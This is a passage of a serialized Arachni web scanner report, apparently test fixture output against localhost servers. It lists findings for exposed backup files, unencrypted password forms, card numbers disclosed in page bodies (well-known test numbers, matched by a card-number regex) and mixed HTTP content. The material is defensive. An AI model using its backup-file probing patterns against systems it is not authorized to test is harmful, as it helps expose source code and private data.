  - discovery
  url: http://localhost:9338/some_filename.src
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.src
    injected: some_filename.src
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.src
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.src
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.tmp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.tmp
    injected: some_filename.php.tmp
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.tmp
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.tmp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.tmp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.tmp
    injected: some_filename.tmp
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.tmp
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.tmp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.inc
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.inc
    injected: some_filename.php.inc
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.inc
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.inc
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.inc
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.inc
    injected: some_filename.inc
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.inc
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.inc
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.copy
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "22"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.copy
    injected: some_filename.php.copy
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.copy
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.copy
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.copy
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.copy
    injected: some_filename.copy
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.copy
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.copy
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/Copy%20of%20some_filename.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "29"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Copy%20of%20some_filename.php
    injected: Copy%20of%20some_filename.php
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: Copy%20of%20some_filename.php
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/Copy%20of%20some_filename.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/Copy%20of%20some_filename
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "25"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Copy%20of%20some_filename
    injected: Copy%20of%20some_filename
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: Copy%20of%20some_filename
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/Copy%20of%20some_filename
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "319"
  cwe_url: http://cwe.mitre.org/data/definitions/319.html
  description: Transmission of password does not use an encrypted channel.
  elem: form
  internal_modname: UnencryptedPasswordForms
  method: GET
  mod_name: UnencryptedPasswordForms
  name: Unencrypted password form.
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
  remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS.
  severity: Medium
  tags: 
  - unencrypted
  - password
  - form
  url: http://localhost:14528/insecure
  var: insecure
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "319"
    cwe_url: http://cwe.mitre.org/data/definitions/319.html
    description: Transmission of password does not use an encrypted channel.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "266"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: UnencryptedPasswordForms
    method: GET
    mod_name: UnencryptedPasswordForms
    name: Unencrypted password form.
    opts: 
      :var: insecure
      :match: insecure
      :element: form
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
    regexp: ""
    regexp_match: insecure
    remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS.
    response: "        <form>\n            <input name='insecure' type='password' />\n        </form>\n\n        <form>\n            <input id='insecure_2' type='password' />\n        </form>\n\n        Will be ignored.\n        <form>\n            <input type='password' />\n        </form>\n"
    severity: Medium
    tags: 
    - unencrypted
    - password
    - form
    url: http://localhost:14528/insecure
    var: insecure
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "319"
  cwe_url: http://cwe.mitre.org/data/definitions/319.html
  description: Transmission of password does not use an encrypted channel.
  elem: form
  internal_modname: UnencryptedPasswordForms
  method: GET
  mod_name: UnencryptedPasswordForms
  name: Unencrypted password form.
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
  remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS.
  severity: Medium
  tags: 
  - unencrypted
  - password
  - form
  url: http://localhost:14528/insecure
  var: insecure_2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "319"
    cwe_url: http://cwe.mitre.org/data/definitions/319.html
    description: Transmission of password does not use an encrypted channel.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "266"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: UnencryptedPasswordForms
    method: GET
    mod_name: UnencryptedPasswordForms
    name: Unencrypted password form.
    opts: 
      :var: insecure_2
      :match: insecure_2
      :element: form
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
    regexp: ""
    regexp_match: insecure_2
    remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS.
    response: "        <form>\n            <input name='insecure' type='password' />\n        </form>\n\n        <form>\n            <input id='insecure_2' type='password' />\n        </form>\n\n        Will be ignored.\n        <form>\n            <input type='password' />\n        </form>\n"
    severity: Medium
    tags: 
    - unencrypted
    - password
    - form
    url: http://localhost:14528/insecure
    var: insecure_2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A credit card number is disclosed in the body of the page.
  elem: body
  internal_modname: CreditCards
  method: GET
  mod_name: Credit card number disclosure
  name: Credit card number disclosure.
  references: 
    Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
    Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
    Luhn Ruby implementation: https://gist.github.com/1182499
  remedy_guidance: Remove credit card numbers from the body of the HTML pages.
  severity: Medium
  tags: []

  url: http://localhost:15383/discover
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A credit card number is disclosed in the body of the page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CreditCards
    method: GET
    mod_name: Credit card number disclosure
    name: Credit card number disclosure.
    opts: 
      :regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
      :match: "6011111111111117"
      :element: body
    references: 
      Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
      Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
      Luhn Ruby implementation: https://gist.github.com/1182499
    regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
    regexp_match: "6011111111111117"
    remedy_guidance: Remove credit card numbers from the body of the HTML pages.
    response: "6011111111111117"
    severity: Medium
    tags: []

    url: http://localhost:15383/discover
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A credit card number is disclosed in the body of the page.
  elem: body
  internal_modname: CreditCards
  method: GET
  mod_name: Credit card number disclosure
  name: Credit card number disclosure.
  references: 
    Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
    Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
    Luhn Ruby implementation: https://gist.github.com/1182499
  remedy_guidance: Remove credit card numbers from the body of the HTML pages.
  severity: Medium
  tags: []

  url: http://localhost:15383/master
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A credit card number is disclosed in the body of the page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CreditCards
    method: GET
    mod_name: Credit card number disclosure
    name: Credit card number disclosure.
    opts: 
      :regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
      :match: "5555555555554444"
      :element: body
    references: 
      Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
      Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
      Luhn Ruby implementation: https://gist.github.com/1182499
    regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
    regexp_match: "5555555555554444"
    remedy_guidance: Remove credit card numbers from the body of the HTML pages.
    response: "5555555555554444"
    severity: Medium
    tags: []

    url: http://localhost:15383/master
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A credit card number is disclosed in the body of the page.
  elem: body
  internal_modname: CreditCards
  method: GET
  mod_name: Credit card number disclosure
  name: Credit card number disclosure.
  references: 
    Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
    Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
    Luhn Ruby implementation: https://gist.github.com/1182499
  remedy_guidance: Remove credit card numbers from the body of the HTML pages.
  severity: Medium
  tags: []

  url: http://localhost:15383/visa
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A credit card number is disclosed in the body of the page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CreditCards
    method: GET
    mod_name: Credit card number disclosure
    name: Credit card number disclosure.
    opts: 
      :regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
      :match: "4111111111111111"
      :element: body
    references: 
      Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
      Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
      Luhn Ruby implementation: https://gist.github.com/1182499
    regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
    regexp_match: "4111111111111111"
    remedy_guidance: Remove credit card numbers from the body of the HTML pages.
    response: "4111111111111111"
    severity: Medium
    tags: []

    url: http://localhost:15383/visa
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    Serving resources over an unencrypted channel
        while the HTML code is served over HTTPS can lead to
        Man-In-The-Middle attacks and provide a false sense of security.
  elem: body
  internal_modname: MixedResource
  method: GET
  mod_name: Mixed Resource
  name: Mixed Resource
  references: 
    Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
  remedy_guidance: Configure the server to serve all resources over the encrypted channel.
  severity: Medium
  tags: 
  - unencrypted
  - resource
  - javascript
  - stylesheet
  url: https://localhost:7760/vuln_script
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      Serving resources over an unencrypted channel
          while the HTML code is served over HTTPS can lead to
          Man-In-The-Middle attacks and provide a false sense of security.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "62"
        Server: WEBrick/1.3.1 (Ruby/1.9.3/2012-04-20) OpenSSL/1.0.1c
        Date: Fri, 05 Oct 2012 18:14:42 GMT
        Connection: Keep-Alive
    id: 
    injected: 
    internal_modname: MixedResource
    method: GET
    mod_name: Mixed Resource
    name: Mixed Resource
    opts: 
      :regexp: http://localhost/stuff.js
      :match: http://localhost/stuff.js
      :element: body
    references: 
      Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
    regexp: http://localhost/stuff.js
    regexp_match: http://localhost/stuff.js
    remedy_guidance: Configure the server to serve all resources over the encrypted channel.
    response: "            <script src=\"http://localhost/stuff.js\"></script>\n"
    severity: Medium
    tags: 
    - unencrypted
    - resource
    - javascript
    - stylesheet
    url: https://localhost:7760/vuln_script
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    Serving resources over an unencrypted channel
        while the HTML code is served over HTTPS can lead to
        Man-In-The-Middle attacks and provide a false sense of security.
  elem: body
  internal_modname: MixedResource
  method: GET
  mod_name: Mixed Resource
  name: Mixed Resource
  references: 
    Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
  remedy_guidance: Configure the server to serve all resources over the encrypted channel.
  severity: Medium
  tags: 
  - unencrypted
  - resource
  - javascript
  - stylesheet
  url: https://localhost:7760/vuln_link
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      Serving resources over an unencrypted channel
          while the HTML code is served over HTTPS can lead to
          Man-In-The-Middle attacks and provide a false sense of security.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "88"
